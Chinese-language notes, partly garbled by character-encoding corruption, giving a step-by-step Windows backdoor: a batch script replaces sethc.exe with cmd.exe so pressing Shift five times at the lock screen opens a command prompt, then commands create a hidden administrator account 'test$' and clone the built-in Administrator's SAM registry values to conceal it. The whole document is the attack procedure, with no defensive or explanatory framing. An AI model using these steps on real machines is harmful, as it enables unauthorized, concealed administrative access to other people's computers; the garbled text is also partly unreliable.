創(chuàng)建替換腳本文件
@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
在鎖屏界面按5次Shift出現(xiàn)cmd窗口
net user test$ 123 /add #添加隱藏用戶(hù)牢撼,一定要加$
net user #查看已有用戶(hù)
net localgroup administrators test$ /add #添加用戶(hù)到用戶(hù)組
regedit
打開(kāi)注冊(cè)表修改相關(guān)項(xiàng)
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\用戶(hù)名 ---> 查看類(lèi)型
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000類(lèi)型號(hào)
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 ---> 將F的值復(fù)制
替換到新建的隱藏用戶(hù)的F值中
替換完后將“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000類(lèi)型號(hào)”
和 “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\用戶(hù)名”
導(dǎo)出
net user test$ /del
將剛才導(dǎo)出的兩個(gè)表導(dǎo)入
這樣隱藏用戶(hù)就創(chuàng)建完成了